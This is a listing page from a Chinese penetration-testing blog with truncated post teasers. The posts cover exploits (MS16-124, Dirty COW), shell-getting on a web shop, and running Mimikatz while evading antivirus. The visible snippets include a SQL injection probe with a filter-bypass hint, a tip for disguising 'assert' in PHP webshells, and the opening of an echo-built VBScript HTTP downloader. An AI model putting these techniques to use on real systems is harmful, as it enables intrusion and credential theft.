Legend‘s BLog-最新发布-第3页

【资源分享】关于Acunetix v11 WebUI下不得不说的事情！

上了官网把介绍跟Quick-start影片看了一下，脑中浮现不少疑问. 有些功能就像跟你玩捉迷藏一样的不知藏到哪里去了，以下分别针对Web UI及CLI (wvsc.exe)的功能做了一些整理： 1. AWVSV11装完以后在哪里？ WEB […]

2016-11-20 legend 阅读(1834) 评论(0)

最近工作中遇到这个问题，记录一下!希望对需要的人有帮助O(∩_∩)O 默认是： asp?id=78″>http://www.xxx.com/shownotice.asp?id=78 and 1=1 实际上用%09 %0A […]

渗透攻击

2016-11-18 legend 阅读(1451) 评论(0)

ATM自动柜员机为人们提供了便捷，现在大家不必去银行就能进行现金交易。用户使用它可以对资金进行敏感操作，当然其中脆弱的通信环节也引来了大量黑客的觊觎。在过去的许多年里，黑客已经发现了多种入侵ATM机的方式，其中不乏暗中进行读卡扫描等物理攻 […]

0DAY

2016-11-08 legend 阅读(1399) 评论(0)

Windows – NtLoadKeyEx Read Only Hive Arbitrary File Write Privilege Escalation (MS16-124) https://www.exploit-db.c […]

0DAY

2016-11-08 legend 阅读(1376) 评论(0)

[crayon-5953e82eb2107811619061/] 转载请注明：转载自Legend‘s BLog 本文链接地址: 脏牛漏洞 Dirty COW CVE-2016-5195 2.6.22 < 3.9 (x86/x […]

渗透攻击

2016-08-18 legend 阅读(4791) 评论(0)

1.关键字拆分。比如assert，可以写成 ‘a’.’ss’.’e’.’r’.’t’这样。 […]

渗透攻击

2016-08-07 legend 阅读(2048) 评论(0)

[crayon-5953e82eb2732104757352/] 转载请注明：转载自Legend‘s BLog 本文链接地址: 乐尚商城GetShell 未经允许不得转载：Legend‘s BLog » 乐尚商城 […]

渗透攻击

2016-08-07 legend 阅读(2611) 评论(0)

Mimikatz现在已经内置在Metasploit’s meterpreter里面，我们可以通过meterpreter下载。但是你如果觉得还要考虑杀毒软件，绑定payload之类的东西太过复杂，我们可以有更好的办法，只需要在自己的电脑上运行 […]

渗透攻击

2016-08-04 legend 阅读(2196) 评论(0)

echo ^Set Post = CreateObject(“Msxml2.XMLHTTP”)^ >>c:\windows\temp\666999.txt echo ^Set Shell = Create […]

安全文档

2016-07-28 legend 阅读(5105) 评论(0)

wooyun_public crawl and search for wooyun.org public bug(vulnerability) and drops 1.安装相关组件 python 2.7和pip mongodb scrapy […]

安全工具

2016-07-25 legend 阅读(2507) 评论(0)

http://pan.baidu.com/s/1pJ03ISN password: 7z7i 转载请注明：转载自Legend‘s BLog 本文链接地址: Sqlmap for Android 未经允许不得转载：Legend‘s BLog […]